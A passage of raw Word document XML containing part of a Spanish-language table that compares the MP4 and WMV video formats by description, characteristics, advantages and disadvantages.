          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>1465391</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1095375" cy="1095375"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>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990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="006B2FC1" w:rsidP="006B2FC1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="00FF41F2" w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>s un estándar de formato multimedia que es parte del MPEG-4. Formalmente llamado ISO/IEC 14496-14:2003. La extensión de archivo oficial es .mp4.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Se usa especialmente para el almacenamiento de video y audio </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>digital, especialmente los definidos por MPEG, pero también puede almacenar otros datos como subtítulos e imágenes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="006B2FC1" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Este codifica el video en casi cualquier resolución, desde las más básicas hasta 4K logrando una gran calidad y archivos de «peso» algo más reducido que el logrado por algunos de sus competidores </w:t>
            </w:r>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">más </w:t>
            </w:r>
            <w:r w:rsidR="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>directos. A</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>demás, cabe mencionar que se basa en el comentado códec para las imágenes H.264 y en lo que se refiere al audio, utiliza AAC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="006B2FC1" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">El formato de archivo MP4 da una impresión de calidad muy parecida a la calidad de vídeo del DVD original. Y los vídeos de este tipo se pueden descargar desde los sitios web de forma rápida y sencilla con la conexión de banda ancha de </w:t>
            </w:r>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>alta velocidad disponible.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="006B2FC1" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MP4 admite hardware de gran tamaño. Como un formato de vídeo estándar, dispositivos y aparatos digitales modernos se pueden reproducir sin problemas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="006B2FC1" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">La tecnología de MP4 es ampliable. Se puede adaptar para crear la base para el </w:t>
            </w:r>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>desarrollo de nuevas tecnologías incluidas en la “familia MP4”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="006B2FC1" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Si se realiza la conversión en un sistema operativo que no sea compatible, podría tener problemas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="006B2FC1">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="006B2FC1" w:rsidRDefault="006B2FC1" w:rsidP="006B2FC1">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Más</w:t>
            </w:r>
            <w:r w:rsidR="00FF41F2" w:rsidRPr="006B2FC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> fácil de descargar por internet de manera ilegal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C25E12" w:rsidRPr="007F0A48" w:rsidTr="006561C1">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="996" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003227B6" w:rsidRDefault="003227B6" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:iCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>WMV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1971" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="0090177F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>1247026</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1114425" cy="1114425"/>
                  <wp:effectExtent l="0" t="0" r="0" b="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990" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="00FF41F2" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Un WMV es un archivo de video en el formato "Windows Media Video" (WMV, por sus siglas en inglés). Es uno de los formatos más utilizados y más antiguo disponible para video digital. Los archivos WMV son ampliamente compatibles, </w:t>
            </w:r>
            <w:r w:rsidRPr="00FF41F2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>crean archivos de video relativamente pequeños y preservan la calidad mejor que muchos otros formatos de video de alta compresión.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003227B6" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Es una alternativa que funciona por medio de varias tecnologías propi</w:t>
            </w:r>
            <w:r w:rsidR="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>etarias de nuevo, de Microsoft.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="003227B6" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">En su funcionamiento utiliza una versión no estándar del conocido MPEG-4 y </w:t>
            </w:r>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>audio con múltiples canales simultáneos usando el códec de vídeo WMV y el de audio llamado WMA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00265093" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Los archivos WMV tienden a ser bastante pequeños teniendo en cuenta la cantidad de info</w:t>
            </w:r>
            <w:r w:rsidR="00265093">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>rmación de video que conservan.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00265093" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Debido al pequeño tamaño, WMV puede ser utilizado en los sitios web sin </w:t>
            </w:r>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>incrementar drásticame</w:t>
            </w:r>
            <w:r w:rsidR="00265093">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>nte el tiempo de carga.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="003227B6" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Además, muchos programas basados ​​en Windows utilizan WMV. Muchos programas especializados, como el software de visualización legal o las primeras versiones de PowerPoint, sólo son compatibles con algunos formatos y WMV es a menudo uno </w:t>
            </w:r>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>de esos formatos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00265093" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>La principal desventaja de WMV es su compatibilidad con las pla</w:t>
            </w:r>
            <w:r w:rsidR="00265093">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>taformas que no son de Windows.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00265093" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Es difícil encontrar reproductores Apple o Linux que sean capaces de reproducir archivos WMV. Por esta razón, WMV no se ha convertido en un formato web </w:t>
            </w:r>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>estándar</w:t>
            </w:r>
            <w:r w:rsidR="00265093">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>, a pesar de su pequeño tamaño.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FF41F2" w:rsidRPr="003227B6" w:rsidRDefault="00FF41F2" w:rsidP="003227B6">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003227B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">La mayoría de los sitios web utilizan la tecnología Adobe Flash ya que está ampliamente disponible en múltiples sistemas operativos. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00454BA6" w:rsidRDefault="00454BA6" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
    <w:p w:rsidR="00236265" w:rsidRDefault="00236265" w:rsidP="00236265"/>
